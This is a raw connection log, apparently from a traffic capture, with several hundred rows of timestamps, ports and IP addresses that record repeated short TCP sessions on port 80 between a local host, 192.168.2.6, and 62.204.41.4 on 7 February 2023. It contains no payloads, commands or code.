Feb 7, 2023 20:03:34.500014067 CET	50299	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.501456976 CET	50300	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.561333895 CET	80	50299	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.561470985 CET	50299	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.563016891 CET	80	50300	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.563188076 CET	50300	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.563838005 CET	50300	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.625458956 CET	80	50300	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.627953053 CET	80	50300	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.629528046 CET	50300	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.736675024 CET	50300	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.737585068 CET	50301	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.798440933 CET	80	50300	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.798641920 CET	50300	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.800220013 CET	80	50301	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.800406933 CET	50301	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.801016092 CET	50301	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.863517046 CET	80	50301	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.866466045 CET	80	50301	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.866660118 CET	50301	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.985495090 CET	50301	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.988080025 CET	50302	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.048775911 CET	80	50301	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.048971891 CET	50301	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.049582958 CET	80	50302	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.049700975 CET	50302	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.050149918 CET	50302	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.111824989 CET	80	50302	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.117278099 CET	80	50302	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.117516041 CET	50302	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.244402885 CET	50302	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.246504068 CET	50303	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.305988073 CET	80	50302	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.306071043 CET	50302	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.307092905 CET	80	50303	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.307348013 CET	50303	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.307802916 CET	50303	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.368504047 CET	80	50303	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.371079922 CET	80	50303	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.371227980 CET	50303	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.483555079 CET	50303	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.484525919 CET	50304	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.544291019 CET	80	50303	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.544531107 CET	50303	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.544717073 CET	80	50304	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.544868946 CET	50304	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.546382904 CET	50304	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.606667042 CET	80	50304	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.610938072 CET	80	50304	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.611175060 CET	50304	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.719773054 CET	50304	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.721656084 CET	50305	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.780328035 CET	80	50304	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.780425072 CET	50304	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.783032894 CET	80	50305	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.783241987 CET	50305	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.785500050 CET	50305	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.848788977 CET	80	50305	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.849256039 CET	80	50305	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:35.849332094 CET	50305	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.953871965 CET	50305	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:35.954730034 CET	50306	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.015202045 CET	80	50306	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.015347958 CET	80	50305	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.015449047 CET	50306	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.015496016 CET	50305	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.017601967 CET	50306	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.078494072 CET	80	50306	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.084789991 CET	80	50306	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.085005045 CET	50306	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.204256058 CET	50306	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.204986095 CET	50307	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.264928102 CET	80	50306	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.265115023 CET	50306	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.266869068 CET	80	50307	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.267051935 CET	50307	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.268284082 CET	50307	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.329674959 CET	80	50307	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.332087040 CET	80	50307	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.332228899 CET	50307	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.460246086 CET	50307	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.461229086 CET	50308	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.521637917 CET	80	50307	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.521820068 CET	50307	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.522779942 CET	80	50308	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.522949934 CET	50308	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.533930063 CET	50308	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.595741034 CET	80	50308	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.598963976 CET	80	50308	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.599096060 CET	50308	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.708754063 CET	50308	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.709487915 CET	50309	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.770469904 CET	80	50308	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.770664930 CET	50308	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.770754099 CET	80	50309	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.770889044 CET	50309	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.772736073 CET	50309	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.834300995 CET	80	50309	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.837404966 CET	80	50309	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:36.837762117 CET	50309	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.965137959 CET	50309	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:36.966288090 CET	50310	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.026654005 CET	80	50310	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.026701927 CET	80	50309	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.026829004 CET	50310	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.026886940 CET	50309	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.027404070 CET	50310	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.087645054 CET	80	50310	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.092389107 CET	80	50310	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.092641115 CET	50310	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.218987942 CET	50310	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.221586943 CET	50311	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.279324055 CET	80	50310	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.279567003 CET	50310	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.281208038 CET	80	50311	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.281435966 CET	50311	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.282021999 CET	50311	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.341661930 CET	80	50311	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.346067905 CET	80	50311	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.349085093 CET	50311	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.454797029 CET	50311	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.455971956 CET	50312	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.514525890 CET	80	50311	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.516114950 CET	50311	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.516702890 CET	80	50312	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.516907930 CET	50312	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.521186113 CET	50312	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.582039118 CET	80	50312	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.584707975 CET	80	50312	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.589246035 CET	50312	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.703366041 CET	50312	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.704510927 CET	50313	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.764571905 CET	80	50312	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.767522097 CET	80	50313	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.767705917 CET	50312	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.767760992 CET	50313	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.774354935 CET	50313	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.836786032 CET	80	50313	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.840990067 CET	80	50313	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:37.844500065 CET	50313	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.953330994 CET	50313	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:37.954487085 CET	50314	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.016194105 CET	80	50313	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.016227961 CET	80	50314	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.016412020 CET	50313	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.016499043 CET	50314	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.017064095 CET	50314	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.078589916 CET	80	50314	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.083966017 CET	80	50314	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.087981939 CET	50314	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.202501059 CET	50314	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.203288078 CET	50315	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.265453100 CET	80	50314	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.265603065 CET	50314	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.265939951 CET	80	50315	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.266060114 CET	50315	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.266612053 CET	50315	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.328536987 CET	80	50315	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.330622911 CET	80	50315	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.330754042 CET	50315	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.438350916 CET	50315	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.439475060 CET	50316	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.499871969 CET	80	50315	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.500049114 CET	50315	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.501089096 CET	80	50316	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.501193047 CET	50316	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.501750946 CET	50316	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.563205004 CET	80	50316	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.566030025 CET	80	50316	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.566164017 CET	50316	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.676904917 CET	50316	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.677943945 CET	50317	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.739873886 CET	80	50316	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.740067005 CET	50316	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.740622044 CET	80	50317	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.740768909 CET	50317	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.748559952 CET	50317	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.811719894 CET	80	50317	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.814222097 CET	80	50317	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.814404964 CET	50317	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.922884941 CET	50317	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.923744917 CET	50318	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.984814882 CET	80	50318	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.984920979 CET	50318	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.985270977 CET	80	50317	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:38.985318899 CET	50318	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:38.985450029 CET	50317	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.046904087 CET	80	50318	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.050878048 CET	80	50318	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.051045895 CET	50318	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.156868935 CET	50318	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.157618999 CET	50319	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.217370987 CET	80	50318	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.217509031 CET	50318	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.217961073 CET	80	50319	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.218096972 CET	50319	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.222800016 CET	50319	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.283920050 CET	80	50319	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.286186934 CET	80	50319	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.286319971 CET	50319	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.407049894 CET	50319	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.414825916 CET	50320	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.467509985 CET	80	50319	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.467592955 CET	50319	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.477979898 CET	80	50320	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.478173971 CET	50320	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.480009079 CET	50320	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.541378021 CET	80	50320	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.544099092 CET	80	50320	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.544213057 CET	50320	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.660098076 CET	50320	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.662453890 CET	50321	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.721745014 CET	80	50320	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.721915960 CET	50320	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.723732948 CET	80	50321	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.723922014 CET	50321	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.741322994 CET	50321	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.802756071 CET	80	50321	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.805164099 CET	80	50321	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.805278063 CET	50321	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.924880981 CET	50321	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.926002979 CET	50322	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.986515999 CET	80	50321	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.986598969 CET	50321	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.987503052 CET	80	50322	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:39.987668991 CET	50322	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:39.988883018 CET	50322	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.050406933 CET	80	50322	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.054217100 CET	80	50322	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.054461956 CET	50322	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.171015978 CET	50322	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.171766043 CET	50323	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.232846975 CET	80	50322	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.233081102 CET	50322	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.234555960 CET	80	50323	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.234721899 CET	50323	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.235917091 CET	50323	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.298307896 CET	80	50323	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.301186085 CET	80	50323	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.302093983 CET	50323	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.405991077 CET	50323	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.406646967 CET	50324	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.467118979 CET	80	50324	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.469094038 CET	80	50323	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.469372988 CET	50323	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.470011950 CET	50324	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.470050097 CET	50324	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.530333042 CET	80	50324	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.533003092 CET	80	50324	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.533198118 CET	50324	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.646651030 CET	50324	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.647650003 CET	50325	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.707132101 CET	80	50324	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.708079100 CET	80	50325	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.708185911 CET	50324	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.708298922 CET	50325	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.711952925 CET	50325	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.772733927 CET	80	50325	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.775124073 CET	80	50325	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.777241945 CET	50325	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.891639948 CET	50325	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.892923117 CET	50326	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.952390909 CET	80	50325	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.952441931 CET	80	50326	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:40.952549934 CET	50325	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.952667952 CET	50326	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:40.953159094 CET	50326	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.012614965 CET	80	50326	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.014763117 CET	80	50326	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.014957905 CET	50326	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.125878096 CET	50326	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.126835108 CET	50327	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.185448885 CET	80	50326	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.185693026 CET	50326	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.187072992 CET	80	50327	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.188333988 CET	50327	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.188879967 CET	50327	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.249324083 CET	80	50327	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.252693892 CET	80	50327	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.252871037 CET	50327	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.388605118 CET	50327	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.389703035 CET	50328	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.449042082 CET	80	50327	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.449296951 CET	50327	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.452033997 CET	80	50328	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.452197075 CET	50328	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.453965902 CET	50328	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.516316891 CET	80	50328	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.523385048 CET	80	50328	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.523586988 CET	50328	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.640117884 CET	50328	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.641138077 CET	50329	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.701455116 CET	80	50329	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.701831102 CET	50329	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.703416109 CET	80	50328	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.703767061 CET	50328	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.705909014 CET	50329	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.765394926 CET	80	50329	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.767422915 CET	80	50329	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.767512083 CET	50329	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.875607967 CET	50329	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.878433943 CET	50330	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.934956074 CET	80	50329	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.935194969 CET	50329	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.937958002 CET	80	50330	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:41.938203096 CET	50330	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:41.942562103 CET	50330	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.001923084 CET	80	50330	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.005326986 CET	80	50330	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.005605936 CET	50330	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.110721111 CET	50330	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.111876965 CET	50331	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.170464039 CET	80	50330	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.170726061 CET	50330	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.172483921 CET	80	50331	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.172714949 CET	50331	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.173293114 CET	50331	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.233850956 CET	80	50331	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.237587929 CET	80	50331	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.237809896 CET	50331	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.361538887 CET	50331	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.372240067 CET	50332	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.422235966 CET	80	50331	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.422461033 CET	50331	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.433866978 CET	80	50332	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.434158087 CET	50332	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.434856892 CET	50332	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.496309042 CET	80	50332	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.499845028 CET	80	50332	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.500089884 CET	50332	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.610776901 CET	50332	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.611932993 CET	50333	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.672564983 CET	80	50332	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.672769070 CET	50332	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.673355103 CET	80	50333	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.673495054 CET	50333	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.674478054 CET	50333	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.735810041 CET	80	50333	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.738182068 CET	80	50333	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.738301039 CET	50333	80	192.168.2.6	62.204.41.4
